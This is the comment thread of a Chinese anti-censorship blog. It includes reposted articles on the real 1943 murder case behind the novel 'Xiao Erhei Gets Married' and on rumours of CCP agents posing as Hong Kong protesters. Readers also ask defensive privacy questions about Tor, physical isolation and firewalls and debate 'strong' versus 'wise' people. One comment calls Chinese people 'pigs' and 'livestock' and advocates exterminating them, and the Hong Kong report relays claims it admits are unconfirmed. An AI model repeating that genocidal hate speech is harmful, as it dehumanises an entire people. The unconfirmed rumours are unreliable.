      这些长期依赖中国商品的国家,除了政治上谋求中共的援助,接受中共的操纵,就没有多少选择了。从长期来看,这种局面究竟是双赢的国际经济政治格局,还是单赢的格局?答案是显而易见的。

      删除
    4. 红色经典《小二黑结婚》真相竟是五角情杀案

      根据老人们对曹的讲述,4名村干部被认为是嫌疑人,还有一个背景,其中的3位未婚村干部与智英贤有着微妙的情感关系:无论年纪还是相貌都与岳冬至相仿的村青年部长史虎山,和岳冬至一起追求智英贤,举棋不定的智英贤则在同时与两位同样优秀的年轻人交往。而同样未婚的村长石献瑛和王天保,也在工作接触中对智英贤有了好感。


      在小说《小二黑结婚》里,作家呈现了一个皆大欢喜的结局。故事的主线是进步青年小二黑、小芹与落后父母二诸葛、三仙姑的婚嫁矛盾。在边区政府的做主下,两个落后人物最终醒悟,一对有情人也终成眷属,双双投身革命。

      一个乡村婚恋的悲剧,在赵树理笔下成为宣传新婚姻法和自由恋爱的范本。

      2006年,作家赵树理百年诞辰。

      这年3月,《大众收藏报》举办收藏品拍卖。在征集的拍品中,发现了一张山西省左权县政府刑庭,于民国32年(1943年)6月5日签发的刑事判决书。

      经鉴定,这张泛黄的纸片,竟是著名作家赵树理创作的小说《小二黑结婚》中的小二黑原型岳冬至的真实案例判决书。当年,身在左权县的赵树理,就是以这件案子为基础,把现实的悲剧改编为大团圆式的喜剧,创作出《小二黑结婚》。

      玉茭地里的恋情

      1943年4月20日,农历三月十六。

      横岭上村,位于晋冀鲁豫边区晋东南的辽县(今山西省左权县),一个仅13户人家的村庄。

      这天晚上黑极了,月亮没有像往常一样出来。位于村中心位置的民革室里,5名年轻的村干部在开会。

      此时,抗日战争已经到了第6个年头。之前一年的夏天,八路军副参谋长左权刚刚在反扫荡战斗中牺牲。在驻扎县城里的日军的持续扫荡下,就像整个边区一样,辽县的形势依然严峻。

      严峻的形势,从当夜村干部会议的议程中也可以看出一二:25岁的村抗日救国联合会主席石羊锁,先是向干部们布置了反扫荡工作,之后又安排了村里的春耕事宜。一年之计在于春,这些都是耽误不得的大事。

      而在会议的末尾,石羊锁话锋一转,借“三大纪律八项注意”中的“不调戏妇女”一项,委婉地对在场的民兵队长岳冬至提出了批评,督促这个20岁的小伙子把精力放在工作上,少做些违法乱纪的事。村里人都知道,他指的是岳与村妇女主任智英贤之间不寻常的恋爱关系。

      “人才长得好,长脸,身高不赖,眼睛不小,大粗辫子一直垂到腰”,65年后,对于故事女主角智英贤的美貌,79岁的村民康双全记得很清楚。更加让村里的老人们印象深刻的,是她的新思想,“活泼开放,胆子大”。而在这个村里,即便是现在,有客人来家吃饭,女主人仍是不能上桌的。

      像那个时代的很多人一样,青春妙龄的岳冬至和智英贤,在十二三岁时就被父母订了亲。岳冬至的未婚妻是他爹给订的一个童养媳,智英贤则以200块大洋被许给了老家河北武安县一个四五十岁的富商。

      说不清什么时候,这对各有“家室”的年轻人的爱恋之火开始燃烧。村里人只是慢慢发现,岳冬至有事没事都爱上智英贤的家门口叫她出来,而这显然引起了女方父亲智老成的不快,他对岳开始有些骂骂咧咧,女方的两个哥哥智恩元和智魁元也颇多牢骚。但智家父兄的不满没能阻止这段恋情越出轨道,有人已经在村子的玉茭地里发现两人在“那个啥”了。

      “他其实并不反对他们谈恋爱,反对的是他们那些勾勾搭搭、乱七八糟的事”。石羊锁已于2005年病逝,他的儿子57岁的石起元对《中国新闻周刊》记者说。

      扑朔迷离的案情

      在这个会议之后,岳冬至一夜未归。

      第二天早晨,他的三哥起早喂牛,发现弟弟双膝跪地,脖子上吊着一根绳子,绳子的另一头系在牛棚门的顶上。当年的命案现场历经多年早已坍塌,变成了堆放玉米秆的地方。“我爹当时就是在这里发现我四叔的”,岳冬至的侄子岳栓福向记者比划,“牛棚的门不到一人高,根本不可能吊死人”。

      根据山西省公安厅档案馆馆长董维民的转述,当时赶到现场的辽县公安局侦查员赵晋鏖也在尸检后发现,尸体的“嘴唇微开,牙关紧咬,颈部索沟无充血现象”——这显然不是自缢该有的迹象;而脊背、屁股和两腰肾囊上的黑青伤痕,则让自杀的说法更加站不住脚。

      作为最后见过死者的人,当晚参会的其余4名村干部,被带到了当时县政府所在地黄漳村的公安局看守所。之后又随着县政府的转移,被安排关押在邻近的武乡县一处煤窑的竖井中。

      村里的文化人曹旺生从2003年开始,曾遍访村里的老人和案件当事人,写下了数千言的调查文字。根据老人们对曹的讲述,4名村干部被认为是嫌疑人,还有一个背景,其中的3位未婚村干部与智英贤有着微妙的情感关系:无论年纪还是相貌都与岳冬至相仿的村青年部长史虎山,和岳冬至一起追求智英贤,举棋不定的智英贤则在同时与两位同样优秀的年轻人交往。而同样未婚的村长石献瑛和王天保,也在工作接触中对智英贤有了好感。

      史虎山,这个在老人们眼里“说话和气、处事稳重、不计较”的人,虽然与智英贤的关系仅仅是发乎情止乎礼,“不搞这种拉拉扯扯的事”,但作为死者的情敌,他自然而然成为嫌疑最大的人。

      太原市收藏协会会长王艾甫收藏着当年这宗命案的案判决书。判决书称:“史虎山踢死岳冬至,因其尚未成年,判处有期徒刑五年,剥夺公权五年。王天保殴伤岳冬至身体,判处有期徒刑一年六个月,剥夺公权一年六个月。石献瑛、石羊锁滥用职权,命令史虎山、王天保殴打岳冬至,各判处有期徒刑一年,剥夺公权一年。岳冬至死后所用棺材洋一百六十元。葬埋时食用小米六十三斤、炒面四十五斤由史虎山、王天保、石献瑛、石羊锁共同负担。”

      作家一丁编写的《太行根据地文化》中,记载了一段关于赵树理和《小二黑结婚》的故事,与判决书上的情节大致相似——

      “1943年春天,赵树理在山西省左权县进行调研。在县里的横岭上村,年轻貌美的姑娘智英贤与同村的小伙子岳冬至相爱。尽管情投意合,两人的爱情却并不顺利。一是因为冬至父母已为他收养了童养媳,在他人眼中是‘有妇之夫’。二是他们的爱情遭到村长石献瑛、青年部长史虎山、救联会主席石羊锁等人的嫉妒。

      那年4月的一天,岳冬至被发现在家中的牛圈上吊自杀,后经尸检排除了自杀的可能。在左权县公安局侦查员的努力下,终于查出真凶原来是史虎山、石献瑛、王天保等人。因情生恨,再加上当天双方发生口角,四人就把冬至叫来“教训”一下,谁承想,竟然活活打死了冬至。

      案情真相大白,一直参与调查的赵树理却感慨良多。赵树理认为这不是一般的情杀,而是反映了新旧两种势力的斗争。于是他以这件案子为基础,把悲剧改为大团圆式的喜剧。”

      然而,村里对命案的凶手却另有说法。2005年9月,石羊锁向曹旺生回忆道:在竖井里的几个月,对于4名村干部来说,可谓煎熬。他们从竖井里出来时,头发长得像个道士一样,浑身虱子,由于井下潮湿,几个人身上都生满了疥疮。

      如果没人出来认罪,大家恐怕很难脱身。经过一番思量,4名村干部在井下议定,让嫌疑最大的史虎山虚报年龄,以17岁的年龄顶罪——这样起码不至被枪毙,而作为对史虎山义气的回报,其余3人承诺将承担起他养家的重担。

      村民们认为史虎山无辜的证据,来源于案发当事人多年后的讲述。石献瑛曾对曹旺生透露,案发当晚,史虎山其实一直呆在家里。而石起元也曾问过父亲石羊锁关于该夜散会后,岳冬至的去向,得到的答案是,岳又跑到智英贤家去了。于是,怀疑的矛头便指向了智英贤的两个哥哥,他们推测,岳应该是在从智家回自己家的路上被智家兄弟无意间打死了。

      在办理这个案子的过程中,赵晋鏖发现边区文联的作家赵树理对此案非常感兴趣,不但亲自听取审讯,还在横岭上村和河北武安县做了调查,前后与办案人员一起吃住了20多天。

      删除
    5. 中国赵树理研究会会长、山西学者董大中编写的《赵树理年谱》,1943年3月到4月间,作家正在离横岭上村不远的后柴城村搞调研,并在该村接到了死者叔叔的告状。

      在横岭村调查此案时,赵树理就是住在了石羊锁家里,他住过的那间现在已经废弃。石起元说,那间房里原来有张大桌子,赵树理当时就是在桌子上办公。

      被村里人认为是疑凶的智家兄弟中的智魁元,差一点受到公安人员和赵树理的调查,但他当年参加中央军走了,差不多3年后才回来,此事也就不了了之。

      被改变的命运

      1943年5月,赵树理写成了他的小说文稿《小二黑结婚》。两个月后,八路军副总司令彭德怀在读完书稿后,欣然题词:像这种从群众调查研究中写出来的通俗故事还不多见。又过了两个月后,小说由(华北)新华书店出版。

      在小说《小二黑结婚》里,作家呈现了一个皆大欢喜的结局。故事的主线是进步青年小二黑、小芹与落后父母二诸葛、三仙姑的婚嫁矛盾。在边区政府的做主下,两个落后人物最终醒悟,一对有情人也终成眷属,双双投身革命。

      同时,作家也保留了故事的大致线索。以至于案件当事人王天保,在以后去县里开会看戏,发现戏文内容与自己村里的案件和人物一一吻合时,惊讶地说,“这不是咱村里发生的事吗?怎么编到戏上了呢?”

      这本封面上标为“通俗故事”的小册子首版只印了4000册,但在出版当年就传遍各地,并出现了众多翻印的版本。1950年前后,这本小说更被英、美、苏联、日本、法国和东欧国家翻译出版,并被译为朝鲜文、越南文、阿拉伯文和西班牙文。

      此外,它还被改编成戏剧、舞蹈、电影、曲艺、连环画,仅仅山西武乡县的一个剧团,前后就曾演出4000场。90岁的高等教育出版社原党委书记、时任左权剧团编剧的皇甫束玉向《中国新闻周刊》记者回忆,他在小说出版当年,就将其改编成了山西梆子剧走进乡村里演出,并为该剧添加了一个“文明结婚”的结尾,以宣传根据地的临时参议会于1942年1月制定的《晋冀鲁豫边区婚姻暂行条例》——董大中说,事实上,这也是赵树理创作小说的动力。

      王艾甫说,以共产党在根据地各村的俱乐部、小学和农民学校为依托,这本小说在农村广泛流传,甚至于“有学校的地方就有这本书”。王艾甫认为,很难估量《小二黑结婚》在移风易俗上所起到的作用。在这位民间收藏家收集到的山西地区婚书中,从清末到民国,童养媳、一夫多妻的现象比比皆是,甚至有“租婚”现象:把老婆借给别人,生完孩子再还回来。

      几位案件当事人因此在今后的人生中,背着沉重的包袱。

      疾病缠身的史虎山在出狱当年就去世了。

      智英贤在案发当年就被父兄送回了河北武安老家,但此事在老家传开后,她没能嫁给与其订婚的富商,而是远嫁并终老于黑龙江。

      智的母亲,因为羞愤难当及思念女儿,在智英贤离开村里不久,就在一棵核桃树上上吊死了。而与岳冬至订亲的那位童养媳,则在岳死后嫁到了上百里地外的旗枝村。

      终生惊恐的石羊锁,每每提及此事都浑身发抖,噤若寒蝉。曹旺生曾多次向他询问当时的一些细节,都遭拒绝,最后还是在其去世的15天前才终于将往事合盘托出。

      “这时他的心很明亮,没有了往日的怕意,言谈很是自然”,曹旺生在其调查文章里写道。

      删除
    6. 传中共募“警察”和“暴徒”入港 死亡可封烈士
      传中共募“警察”和“暴徒”入港 死亡可封烈士
      香港民众反送中抗争活动现场疑似有警员乔装示威者混入人群配合警方行动。(视频截图)
      北京时间:2019-09-20 03:26
      【新唐人北京时间2019年09月20日讯】香港民众的民主抗争运动已持续超过100天,在此过程中,不仅先后出现了白衣人、蓝衣人等帮派黑恶势力打着撑警的幌子持械攻击抗议人群,还出现了疑似警方人员伪装抗议者投掷汽油弹等制造事端的情况。日前有来自中国大陆的消息指中共公安正在大陆高价招募人员赴港充当“警察”或“暴徒”,甚至允诺如果死亡可封“烈士”,令外界担忧中共或将采取乔装嫁祸等惯用手段为其血腥镇压制造口实。

      海外独立媒体《大纪元》9月16日获悉来自中共公安内部的消息,河北省石家庄正从各地级县/市警局抽调选派人员赴港“平暴乱”,其中优先选择临时雇佣的人员。据说这些被选中的人若在香港“表现好”,回来之后即可转正成为正式的警察;如果“牺牲了”还可封为烈士。消息人士表示,具体选调的人数目前还不太清楚,但已听说有个县/市送到石家庄的警察人数就有百名之多,而有关部门只从中选出10人左右。
      此外,还有知情者近日向《大纪元》爆料,他的儿子在深圳一家公司工作,当地公安曾到他们公司招聘临时工去香港“当暴徒”,每天薪酬一千元人民币,公安许诺会保证他们的安全。
      虽然以上消息尚未获得其他渠道的证实,但在过去三个多月的香港抗争运动中,不但香港警方对抗议者的镇压滥用武力的情况越来越严重,还发生了黑帮分子持械袭击抗议者的恶劣事件,而香港警方对这些黑帮分子明显持包庇纵容的态度。
      更严重的情况是,在民众抗议现场,还多次出现了不少身藏可伸缩警棍和胡椒喷雾器并佩戴各色荧光标志的身份不明人员,他们伪装成示威者的模样,伺机投掷汽油弹、燃烧瓶制造事端,并在警方发起拘捕行动时配合警方抓捕抗议人群中的目标人物。外界高度质疑这些乔装为抗议者模样却配合警方行动的人是便衣警察,并强烈谴责警方人员冒充抗议者恶意制造事端、栽赃嫁祸,抹黑香港民众抗争行动的正义性。
      例如:在8.25警民冲突中,就有媒体记者拍摄到了身上藏有绿色荧光标记的可疑人员伺机投掷汽油弹的现场,并质疑警方正恶意嫁祸示威者。

      Cosplay?!? pic.twitter.com/4VxSB2e1HL
      — VNsupportsHKdemocracy (@VNdemocracy) August 26, 2019
      今年8月初,法国社会学家、香港浸会大学政治及国际关系学系系主任高敬文(Jean-Pierre Cabestan)教授在接受法国《费加罗报》(Figaro)采访时曾透露,“北京秘密地在广东和邻近省份调动人手,增援人数约3万的香港警队,广东人能说粤语,因此能装扮成香港人。”
      相关消息曝光后被多家海外媒体报导,香港警务处随后发表新闻稿坚称“绝无此事”。高敬文则于8月8日在脸书发文回应,再次肯定大批大陆警察混入港警这一消息的真实性,并补充说大约有两千名大陆警察已混入香港警察当中。
      8月13日,香港抗议民众在机场发现疑似“中共卧底”的三名大陆男子混迹在抗议人群中。其中一人是中共喉舌《环球时报》记者付国豪,另两人的名字被发现出现在深圳福田公安的名册中。随后,付国豪也被质疑有中共国安背景。
      就在今天(9月19日),一名英籍媒体记者在脸书上发帖透露,有消息人士告知,香港亲共建制派立法会议员何君尧9.21将在沙田有所行动,到时元朗和福建黑帮及其他蓝丝会到场闹事,警方则将拘捕所有对抗这班流氓的人。

      此前,由于被称为“福建帮”的一些帮派分子身穿白衫持棍、持刀攻击抗议者,引发了香港民众的极大愤慨,福建民族党9月17日曾在其官方推特账号上发表“郑重声明”,强调不久前在北角街头持械攻击香港市民的人是“少数拿中联办黑钱的福建裔香港人社团”,与热爱西方文明的福建人(闽越)无关。
      有分析指出,中共官媒现在已经大肆诬陷香港民众暴乱,把警察冒充香港示威者放火说成市民所为,这和当初中共为迫害构陷法轮功,在天安门广场制造自焚伪火如出一辙。中共一贯采取自导自演的手段为其血腥镇压制造口实。在六四屠杀中,让军人伪装成“暴徒”;在屠杀藏人中,让武警伪装成僧侣。而最后这些都成为中共屠杀和宣传制造仇恨、欺骗民众的工具。因此香港人应该高度警惕中共故伎重施,蓄意制造杀人事件嫁祸抗议者,需提前准备好相应的防范与应对策略。

      删除
  18. 回复
    1. https://program-think.blogspot.com/2016/12/howto-prevent-hacker-attack-8.html
      关于黑客入侵8:物理隔离的文章,启用物理隔离有个悖论,你怎么解决?

      你认为启用物理隔离可以提高安全性,然而能够实现虚拟机逃逸的黑客都有一定实力,既然病毒都入侵主机了,那么进一步【感染局域网内的网关机】,应该也能做到,而网关机也被感染,真实ip就会暴露,就危险了
      这就成了【一个悖论】。

      一般人是不懂太多it技术的,可能对于博主这样的人来说,安全措施多一点,能降低风险,不过对于普通人来说,都被能逃逸虚拟机的黑客盯上了,启用物理隔离似乎也没什么用了?

      删除
    2. 博主以前提到的防火墙iptables似乎已经被firewalld淘汰了。使用被淘汰的iptables防火墙是否有安全风险?

      删除
    3. 如果我要和某个可能是骇客或有危险的人联系,但我又担心他攻击我,我不太懂IT安全技术,短时间学不现实,也肯定不如对方。那用什么办法最大程度保证自己安全,同时又能正常沟通?

      我想到一个办法,博主看看有没有问题和有没有别的办法?

      先假定基于tor的多重代理和虚拟机。我使用匿名邮箱给他发邮件,告诉他联系内容和某个公共论坛的网址,让他到【公共论坛】的某个地方去开贴回复信息。如果有私密内容,我会提前在邮件里贴上某种暗号或密语。
      这样就能避免对方在邮件里传病毒了,而且由于是公共论坛,能看见内容的可能有很多人,对方要攻击,就要攻击很多人,这很麻烦。

      删除
    4. https://program-think.blogspot.com/2016/12/howto-prevent-hacker-attack-8.html?comment=1481561069584#1481561069584
      这里16楼的6单元的回复实在看不懂什么意思,感觉矛盾奇怪。

      meek的英文链接的文章内容我看不懂,不过应该不影响我看你回帖内容。

      [quote]头两种物理隔离,是【不可能】用除了物理隔离之外的技术手段来实现的[/quote]

      这话听着怪?头两种物理隔离指的是
      [quote]物理隔离1型
      多个物理系统之间【存在】网络连接。
      物理隔离2型
      多个物理系统之间【没有】网络连接,但【存在】存储介质的交换(比如:通过“U盘”交换数据)。[/quote]

      既然头两种都不能用,难道第三种隔离度最高的反而能用物理隔离之外的手段实现了?

      而且你文章里说了物理隔离3型是【没有】网络连接也没有存储介质交换的,但你6单元又说[quote]每个物理系统各自跑一个 Guest OS,这两个 VM 之间也【可以网络通讯】[/quote]

      这不就矛盾了吗?

      删除
    5. 先就这几个问题

      删除
    6. 博主:胡锡进因为沦陷日临近翻不了墙了,他在微博上发了"国庆节快到了,上外网极其困难,连环球时报的工作都受了影响,我个人觉得这有些过了,再次提点意见,希望得到倾听。"他还说,"走群众路线,相信群众很重要,我们人民群众绝大多数人都爱国爱党,有强大的政治分辨能力,立场坚定。这个国家并不脆弱,建议还是要在我们的社会和外网之间多留出一些缝隙,这将有益于中国舆论场的强大与成熟,有益于科学研究和对外沟通,有益中国国家利益。"
      我个人觉得虽然这个人做奴才做惯了狗嘴里吐不出象牙,但是这次这个微博还是发的挺中肯的,只可惜他主子不信任他。这也没办法。

      删除
    7. 另外博主:我实在不明白怎么胡锡进连去香港买一片SIM带回墙内漫游都不懂?照理说他经常上外网,去香港,对这些东西不应该不了解啊。

      删除
    8. 最近似乎没觉得翻墙变的更困难。但有些像赛风之类的工具很久都不能正常使用了。

      删除
    9. 道道道来领五分了2019年9月19日 下午10:11:00

      你真会扯淡,睁着眼说瞎话,明明是翻墙很困难了,而且赛风很好用,呵呵

      删除
    10. 说我是五毛的才是真五毛狗吧。很久前连老犊子都不敢这么说我了,要是看全了我的发言,就知道我不可能是五毛的。

      删除
    11. TO 悖论(1单元)
      你提到说:
      [quote]能够实现虚拟机逃逸的黑客都有一定实力,既然病毒都入侵主机了,那么进一步【感染局域网内的网关机】,应该也能做到,[/quote]

      你这个逻辑【不】成立。

      首先,
      “物理隔离”,【未必】在同一个局域网。

      其次,
      两台相互“物理隔离”的机器,甚至都不一定在同一个时间运行。
      如果一台在运行,另一台关机。并且关机的那台【没有】远程唤醒。
      那入侵者再牛逼,如何从一台渗透到另一台捏?

      最后,
      就算按照你的说法,两台 PC 在同一个局域网(并同时在运行)。
      如果两台 PC 各自都开启主机防火墙,相互【没有】可见端口。
      然后再通过某些网络设备(交换机、路由器)稍微隔离一下。
      这时候,【攻击面】会远远小于“虚拟机穿透”,因此攻击难度大得多。

      删除
    12. TO 悖论(2单元)
      你大概不了解 iptables
      下面是中文维基百科的链接
      https://zh.wikipedia.org/wiki/Iptables

      注意开头这段:
      [quote]
      iptables支持内核2.4以上版本,旧版内核环境下则使用ipchains(于2.2版内核)或ipwadm(于2.0版内核)完成类似的功能。
      2014年1月19日起发行的Linux内核3.13版则使用nftables取而代之,但仍然提供iptables命令做为兼容接口。
      [/quote]


      TO 悖论(3单元)
      要降低攻击面
      以【公共论坛】交换信息,是一个办法。

      删除
  19. 想问楼主,肉身在国外,有亲人在国内,在国外上网发表一些言论如何保护自己,有什么注意事项吗?有telegram,但是是用自己的手机号注册的,用telegram参与一些香港游行的讨论安全吗?
    安装在苹果手机上的微信会窃取我手机的上网记录吗?

    回复删除
    回复
    1. 再一次不厌其烦的重复博主信息:
      1.不要使用手机,要使用传统电脑,并且要完全格式化刷空以后重新安装Linux
      2.戴tor戴tor戴tor(重要事情说三遍)

      删除
    2. Telegram 本身就不安全,因为它要求绑定手机号,如果你使用虚拟号码注册 Telegram 则有可能会被封号,如果虚拟号码被其他人注册了,那么你的账号的控制权就变成对方的了。

      删除
  20. - - 每次都期待看随想叔的技术文,但当每次看的时候脑壳还是疼。//哈哈

    回复删除
  21. 【2009年】开通博客发的是 C++ Python ,那你当初有没有用基于Tor的多重代理?会不会是2009年的ISP和GFW没有日志,所以没被跨省追捕?

    回复删除
    回复
    1. 博主自从启用这个身份以来一直使用 TOR 双重代理,所以你的这个担心是完全多余的。

      删除
    2. TO V2EX
      https://docs.kali.org/general-use/kali-linux-forensics-mode 一般的Live可能自动挂载分区,推荐 Forensic 模式。这个模式可以亲自实现,在内核参数中添加 boot=live noswap noautomount ;有人厌恶 Debian 及其衍生品的,可以在其它发行版中亲自实现 Forensic 模式 https://wiki.archlinux.org/index.php/Remastering_the_Install_ISO

      删除
    3. TO 一些小问题
      我感觉你似乎回错楼层了?

      删除
  22. 博客公告上有好几篇预防跨省追捕的文章,但大部分是【废话】,甚至遗漏了【要点】。建议博主删除公告栏那几篇,再额外总结一篇没有废话的。遗漏了这些:联想和技嘉本来就是中国公司,建议买戴尔或惠普,德国和英国也有电脑公司;【超声波去匿名】基于Tor的代理, https://www.bleepingcomputer.com/news/security/ultrasound-tracking-could-be-used-to-deanonymize-tor-users/ 推荐用耳机。耳机要用海绵套遮住,还要自带调音量的滑轮:万一操作系统中了【病毒木马】,请用耳机上的滑轮降低音量,海绵套应该有隔离性。

    回复删除
  23.   隐蔽性
      “被动型后门”需要显式开启监听端口,很容易引起用户的怀疑,或引起杀毒软件的注意。
      相比之下,“被动型后门”就【没有】这个问题。
    写错了吧

    回复删除
  24. 哈哈哈哈,今天试着用洋葱浏览器来看博客,发现博主连隐私政策的自动提示语言都换上了【编程随想文风】。
    [quote]本博客架设在 Google 的 Blogspot 平台, 该博客平台用 cookies 统计用户访问数量; 由于你的访客 IP 来自欧洲国家, 根据欧盟法律要求, 俺必须告知你上述 cookies 的情况[/quote]
    这有可能暴露博主对个性化定制细节的执着,这种个性挺明显,而且很难伪装,希望博主周围有很多类似性格的nerd形成掩护。

    洋葱浏览器发评论失败,人机验证成功之后,再点提交,会跳回编辑框,且编辑框变成红色。洋葱浏览器的安全等级我设定在了safer,按照描述,应当只禁用了非HTTPS的JavaScript.

    回复删除
    回复
    1. 致远星战况如何?看来你完全没用过欧洲代理。不过手机版会显示 Google 原版的对应 IP 国家语言的提示。

      删除
  25. 黨國70年國殤日在即,博主要不要給領導們送份大禮?

    回复删除
    回复
    1. 嘻嘻嘻,写这种文章才是编程随想的风格

      支那猪圈共产国成立70年,博主该有点抹黑支共的大动作才是,下篇文章写什么内容有啥想法吗?

      删除
    2. 支共当年要武装保卫的苏联寿命69年,支共拙劣山寨对方在支那猪圈建立的共产国寿命超越了原型,足以证明窝的观点:劣等支那文化+共产主义的丑陋结合——支那特色射秽主义,非常适合支那猪圈和其内部圈养的支那贱畜。苏联倒台前夕,早有反共勇士发出“俄罗斯的男人不能再这样(在苏联体制下变得不人不鬼)下去了”的呼声,贵支这样的人也有,但近些年越来越少,反倒是粉红支畜越来越多,支那猪圈前景堪忧,虽说窝主张要灭绝支那贱畜,但十几亿头弱智支畜不是一朝一夕可以灭尽,有识之士当速速脱支,不要和这艘破船一起沉底

      删除
  26. 回复
    1. 1.关于智者和强者的问题。首先关于强者定义:
      1.方便定量比较。
      我之所以拿【财产】为衡量标准,不是我不懂你说的权力胜于金钱,而是以【财产】来衡量可以【定量比较】不同人的强弱水平。

      权力,影响力要比大小最好也要换算成数字来比。比如皇位是买不到的,但皇位也可以换算成金钱,粗略估值:10万亿。
      中国实权皇帝强于本国首富1百倍左右。

      2.钱是最不能缺少的东西。
      财富的确不如权力强,但财富是最不可获缺的一样东西,地位贵为天子也不可缺钱,天子若缺钱,也会显得[b]寒酸,难堪,被人内心【鄙视,看不起】[/b] 。

      3.你对比想想为什么评价文明等级的[b]卡尔达肖夫指数[/b]是用文明能够利用的能源量级,而不是影响力?

      [b]资源(物质+能量+信息)[/b]的概念是全宇宙通用的。对应到人类社会就是金钱,权力。影响力也要换算成可以快速兑现的金钱资源。

      4.强者即使不能令多数人都臣服,最起码也要让多数人都羡慕。智者可以不得到多数蠢人认同,但强者必须得到。

      至于你说的反例,我也能想到,这是种极端情况。如果是植物人和弱智,根本就不能做到真正[b]掌控财富和傀儡皇帝差不多,当然不算是强者。

      还有你拿影响力来衡量,那我同样可以[b]举出反例[/b]:很穷的国家首脑,清官,类似钱学森这种有5个师称号的人影响力都很强。按你的说法是强者?

      但我认为不算。

      因为强者,顾名思义是[b]实力强大的个人[/b]。一个人无论他使国家强大了多少,他自己不强,就不算强者。

      从他人羡慕崇拜,人性自私的角度看。

      [b]人想要成为的强者是那种自己拥有巨大的财富和力量,让愚者崇拜,让野心家想要取而代之的存在。[/b]

      古代实权皇帝肯定算强者,即便很笨只要不是弱智,不是傀儡就算是强者。
      但是清廉的高官就比较尴尬了,国家不是他们的私产,工资又低。就算有人称这样的人为强者,别人也不想成为这样的强者,估计清官的家人都不喜欢清官。

      删除
    2. [b]包括博主你还有很多教师,学校在普及知识前都没解释过下面这一系列问题[/b]:

      人为什么要学习知识,提高智慧?
      为什么知识智慧最强的人不是强者,往往只是中产?
      [b]人应该成为智者还是强者?[/b]
      [b]智者和强者不统一是否应然?[/b]


      再补充下智慧和力量的关系。

      智慧因能增强人的力量而具备长期的高价值,否则智慧无意义,且智慧不能让人类成为地球统治者的话,那智慧就可能被淘汰了。

      而力量可以使智慧长期稳定的存在,智者如果弱小,那智慧就可能被消灭。智慧和力量互相反哺最好。

      人本能的渴望力量,而智慧才是人之所以为人的[b]根本原因[/b]。

      若论侧重点,我更倾向于强者和力量。毕竟大多数人的智慧水平并没有质的差别。力量要比智慧有效。

      智者如果想要推广自己的思想,增强自己的实力,用力量去推广自己的智慧,效率才是最高的。

      你的文章肯定有很多人不会信,因为你说的再多,在别人眼里,你不是强者就[b]没有说服力和吸引力[/b]!

      删除
    3. 3.[quote]“强调反压迫”好过“强调平等”[/quote]
      看样子博主认可我的观点,但博主在这之前似乎从来没有正式反对过平等这一诉求?
      你提供的链接,没有正式反对平等这一诉求,也没论证自由比平等重要,自由的诉求更接近基础和核心诉求。

      你之前说[quote]“平等主义”这个切入点,效果不一定好。哪些追求是可行的,哪些则必将导致“反面乌托邦”[/quote]

      我觉得否定平等的诉求至少很新颖,攻击一般人不会想到的方面比较出其不意。一般人在否定社会主义的时候,不会去否定平等的诉求。资本主义支持者常提机会平等,但实际上双胞胎的机会也未必平等,问题不在于机会平等,而在于平等的诉求就有[b]问题[/b]。

      不光是要考虑哪些平等追求是否可行的问题,而是有些平等诉求压根就是错的,除了平等和不平等的关系,还有平行的关系。你似乎没用过[b]平行这个词[/b]。

      最好以后再写文章否定下平等这一诉求。

      删除
    4. 4.我建议你写论证应然的文章。还有我再补充提醒你一下。

      这个时代的应然[b]不等于[/b]未来理想世界的应然,你最好要有超越时代的眼光。

      比如原始社会以前,人类族群的首领诞生方法和猴子差不多,是看谁打架强,这在当时是实然也是应然,有一定合理性。当时,智慧作用还不大。

      但从(相对原始人来说的未来)未来人眼光来看,太野蛮原始了,不是理想世界的选举方式。这种产生首领的方法在未来看就不是应然。

      删除
    5. 5.博主之前漏了一个问题。关于你推荐的反脆弱的书的不同看法。反脆弱这书关于工作的建议,感觉是在规劝人平庸?

      极端斯坦和平均斯坦,其实就是高低风险的问题。

      黑天鹅那本书的作者让人去做低风险的工作,远离极端斯坦,有种规劝人平庸的感觉。

      低风险的那类工作要很长时间才能积累到不多的财产,但人的寿命本来就有限,如果年轻的时候不富裕,到年老了才富裕,很多东西也就永远错过了。

      而且假如是在古代,那有机会就得去造反做极端斯坦的皇帝,因为不当皇帝,就是皇帝的狗奴才,臣子百姓都是皇帝的狗奴才。这涉及到人格尊严还有生命安危的问题。


      而且即使[b]不谈收益,只谈风险[/b]。规避了某个风险,就可能逃不掉另一种风险。比如穷人不敢冒险创业投资,那么就可能逃不掉一辈子穷导致的贫穷疾病,被人欺负等风险。

      你怎么看?

      删除
    6. 问题1和问题4其实在现实中有点联系。博主你真觉得绝大多数智者不是强者这个现象是合理的吗?

      智者不能同时兼任强者也是反智主义滋生的根源之一。如果智者大多数都是强者,那【反智主义早绝迹了】!!!


      如果一半人都是理性的,那很多富人就不会靠奢侈品,主播等收智商税发财了。

      上篇文章的9楼5单元和12单元不知道看全了没,举了很多例子
      https://program-think.blogspot.com/2019/09/share-books.html?comment=1567637489544#1567637489544

      12单元还提到了很多消极自由都是愚蠢的自由。包括经济学家,伦理学家,我发现有时都会把实然的消极自由当成应然。很多自由,现象并不积极,美好,先进!

      而且这些学者只是智者,不是强者,别怪我不服他们,他们自身实力不够强。阴谋论一下,我怀疑他们在心理上沦为了强者的奴才?

      就像在古代萧何,张良,刘伯温给强者皇帝当奴才那样,他们也同样可以说出皇帝应然是皇帝的理由来。

      问题5.请慎重引用学者的著作,如果这些学者在心理上沦为强者的奴才,那就像是被毛洗脑的学者那样,很多话都不能信了。

      删除
    7. 其实还有问题,但怕博主不回。暂时停止

      删除
    8. 对了。关于问题1的强者和智者的问题,我思考了很久。这问题和读书无用论的问题其实是不同的。

      这系列问题涉及到更加深刻本质的问题。这还涉及到人究竟因何而成为人的问题。人该往什么方向走的问题

      还有些感情用事的人认为,人之所以为人是因为[b]有人性[/b]。这纯粹无稽之谈,感情用事。历史上那些喜欢杀人的暴君,都是人,并且还是强者,受愚民膜拜呢。

      删除
    9. 博主才懒得理支畜的问题

      删除
    10. 楼上的冒牌狗你妈死了

      删除
    11. 冒充狗又来我这儿捣乱了

      删除
    12. 12单元的才是冒充本人的死马货,大伙有目共睹

      删除
    13. 楼上的傻逼冒充水平太烂,有脑子的人一看便知,下次我启用 GPG 之后欢迎来冒充

      删除
    14. TO 道道道
      [b]关于“强者的定义”[/b]
      重新回顾你刚开始引出这个话题的留言。
      你的原话是:[quote]俗人之所以崇拜强者,皆因【力量要比知识管用】。[/quote]

      如果你要从【力量】的角度探讨这个话题,俺的观点是:
      “影响力”比“权力”更准确;
      “权力”比“财富”更准确。

      至于“能不能量化”,【不】应该作为参考因素。
      本来社会学以及人文领域的很多东西,都是【无法量化】。
